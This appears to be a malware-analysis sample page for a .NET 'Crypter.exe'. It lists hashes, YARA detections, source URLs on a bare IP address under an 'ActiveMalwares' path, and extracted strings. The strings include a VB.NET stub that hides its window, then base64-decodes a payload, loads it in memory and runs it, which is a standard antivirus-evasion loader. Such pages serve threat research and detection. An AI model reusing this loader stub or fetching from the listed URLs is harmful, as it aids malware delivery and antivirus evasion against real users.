Sample details: 43d7542b89444de734fb1bc171e16cf1 --

Hashes
MD5: 43d7542b89444de734fb1bc171e16cf1
SHA1: 2d0829ad52980bd985f0a5b4e4edd3453ca0ae63
SHA256: 6471c15e3635b6b435d0a216599da44dbdcf3198a8c6c6ce1f99bd00e86d1a3f
SSDEEP: 384:s8RBQoOz8JIR5B14LOewx4kvP96uEsLaDHFhMoC7TwjUjJ684ZLk2459Ba3Xxsz6:s83QNQ21vElC5gM2dsz+bfM
Details
File Type: PE32
Yara Hits
YRP/Microsoft_Visual_Studio_NET | YRP/Microsoft_Visual_C_v70_Basic_NET_additional | YRP/Microsoft_Visual_C_Basic_NET | YRP/Microsoft_Visual_Studio_NET_additional | YRP/Microsoft_Visual_C_v70_Basic_NET | YRP/NET_executable_ | YRP/NET_executable | YRP/NETexecutableMicrosoft | YRP/IsPE32 | YRP/IsNET_EXE | YRP/IsWindowsGUI | YRP/HasDebugData | YRP/IsBeyondImageSize | YRP/domain | YRP/IP | YRP/contentis_base64 | FlorianRoth/DragonFly_APT_Sep17_3 |
Source
http://103.68.190.250/Sources//ActiveMalwares/Spliter/spliter/bin/Debug/Crypter.exe
http://103.68.190.250/Sources//ActiveMalwares/Spliter/spliter/obj/Debug/Crypter.exe
Strings
		!This program cannot be run in DOS mode.
`.sdata
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADPU8y|
Public Class Form1 
Public Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
Me.Hide()
Me.ShowInTaskbar = False
Me.ShowIcon = False
Me.Opacity = 0
maloumat
Dim str2 As String = ""
Dim num3 As Integer = paracetamol1.Length
Dim i As Integer = 1 
Do While (i <= num3) 
str2 = rahj
i += 1
Dim best As Object = AppDomain.CurrentDomain.Load(Convert.FromBase64String(str2))
Dim gest As String = best.EntryPoint.Invoke(Nothing, Nothing)
End Sub
End Class
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
fSystem.Drawing.Icon, System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aBj
QSystem.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
v2.0.50727
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
Crypter.My
MyComputer
MyProject
MyForms
MyWebServices
ThreadSafeObjectProvider`1
Crypter
Resources
Crypter.My.Resources
MySettings
MySettingsProperty
Microsoft.VisualBasic.ApplicationServices
WindowsFormsApplicationBase
.cctor
__ENCAddToList
System.Collections.Generic
List`1
System
WeakReference
__ENCList
OnCreateMainForm
Microsoft.VisualBasic.Devices
Computer
Object
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_Forms
m_MyFormsObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
get_Form1
m_Form1
set_Form1
Create__Instance__
System.Windows.Forms
Instance
Dispose__Instance__
instance
System.Collections
Hashtable
m_FormBeingCreated
Equals
GetHashCode
GetType
ToString
get_GetInstance
m_ThreadStaticValue
GetInstance
Dispose
disposing
System.ComponentModel
IContainer
components
InitializeComponent
Button
_Button1
get_Button1
set_Button1
WithEventsValue
_Button2
get_Button2
set_Button2
TextBox
_TextBox1
get_TextBox1
set_TextBox1
NumericUpDown
_NumericUpDown1
get_NumericUpDown1
set_NumericUpDown1
_TextBox2
get_TextBox2
set_TextBox2
_Button3
get_Button3
set_Button3
_Button4
get_Button4
set_Button4
_Button5
get_Button5
set_Button5
_Button7
get_Button7
set_Button7
EventArgs
Button1_Click
sender
Button2_Click
NumericUpDown1_ValueChanged
Form1_Load
ProgressBar1_Click
Button3_Click
Button4_Click
Button5_Click
Button7_Click
PictureBox1_Click
Button1
Button2
TextBox1
NumericUpDown1
TextBox2
Button3
Button4
Button5
Button7
System.Resources
ResourceManager
resourceMan
System.Globalization
CultureInfo
resourceCulture
get_ResourceManager
get_Culture
set_Culture
get_stub
Culture
System.Configuration
ApplicationSettingsBase
defaultInstance
addedHandler
addedHandlerLockObject
AutoSaveSettings
get_Default
Default
get_Settings
Settings
System.Threading
Monitor
get_Count
get_Capacity
get_Item
get_IsAlive
set_Item
RemoveRange
set_Capacity
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
get_UseCompatibleTextRendering
SetCompatibleTextRenderingDefault
AuthenticationMode
set_IsSingleInstance
set_EnableVisualStyles
set_SaveMySettingsOnExit
ShutdownMode
set_ShutdownStyle
set_MainForm
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
STAThreadAttribute
DebuggerNonUserCodeAttribute
DebuggerStepThroughAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
ArgumentException
System.Reflection
TargetInvocationException
Control
get_IsDisposed
RuntimeTypeHandle
GetTypeFromHandle
ContainsKey
String
GetResourceString
InvalidOperationException
Activator
CreateInstance
ProjectData
Exception
SetProjectError
get_InnerException
get_Message
ClearProjectError
Remove
Component
MyGroupCollectionAttribute
ThreadStaticAttribute
System.Runtime.InteropServices
ComVisibleAttribute
CompilerGeneratedAttribute
EventHandler
add_Load
IDisposable
ComponentResourceManager
System.Drawing
Decimal
ISupportInitialize
BeginInit
SuspendLayout
get_DarkMagenta
ButtonBase
set_BackColor
get_White
set_ForeColor
set_Location
set_Name
set_Size
set_TabIndex
set_Text
set_UseVisualStyleBackColor
get_Black
UpDownBase
set_Value
TextBoxBase
set_MaxLength
set_Multiline
ScrollBars
set_ScrollBars
ContainerControl
set_AutoScaleDimensions
AutoScaleMode
set_AutoScaleMode
SystemColors
get_ActiveCaptionText
ImageLayout
set_BackgroundImageLayout
set_ClientSize
ControlCollection
get_Controls
FontStyle
GraphicsUnit
set_Font
get_Gray
GetObject
set_Icon
get_ControlDarkDark
set_TransparencyKey
EndInit
ResumeLayout
PerformLayout
remove_Click
add_Click
remove_ValueChanged
add_ValueChanged
OpenFileDialog
FileDialog
set_Filter
CommonDialog
DialogResult
ShowDialog
get_FileName
FolderBrowserDialog
get_Value
Conversions
get_Text
System.IO
ReadAllBytes
Convert
ToBase64String
get_SelectedPath
Concat
WriteAllText
get_Length
ToDouble
ToInteger
Strings
Replace
Interaction
MsgBoxResult
MsgBoxStyle
MsgBox
IsNullOrEmpty
set_SelectionStart
set_SelectionLength
SaveFileDialog
Operators
CompareString
set_Title
set_FileName
DesignerGeneratedAttribute
AccessedThroughPropertyAttribute
ReferenceEquals
Assembly
get_Assembly
GetString
SettingsBase
Synchronized
get_SaveMySettingsOnExit
ObjectFlowControl
CheckForSyncLockOnValueType
ShutdownEventHandler
add_Shutdown
DebuggableAttribute
DebuggingModes
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
AssemblyFileVersionAttribute
GuidAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
Crypter.exe
Crypter.Resources.resources
Crypter.Form1.resources
MyTemplate
8.0.0.0
My.User
My.Application
My.Computer
My.Forms
My.WebServices
System.Windows.Forms.Form
Create__Instance__
Dispose__Instance__
My.MyProject.Forms
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
Button5
Button4
Button3
TextBox2
NumericUpDown1
TextBox1
Button2
Button1
Button7
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
12.0.0.0
My.Settings
WrapNonExceptionThrows
1.0.0.0
$311ad671-943c-4438-9ab6-546a39e225e3
Copyright 
  2015
spliter
_CorExeMain
mscoree.dll
,fCN8=D
C:\Users\xes\Desktop\Crypter By Ben Moh\spliter\obj\Debug\Crypter.pdb
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>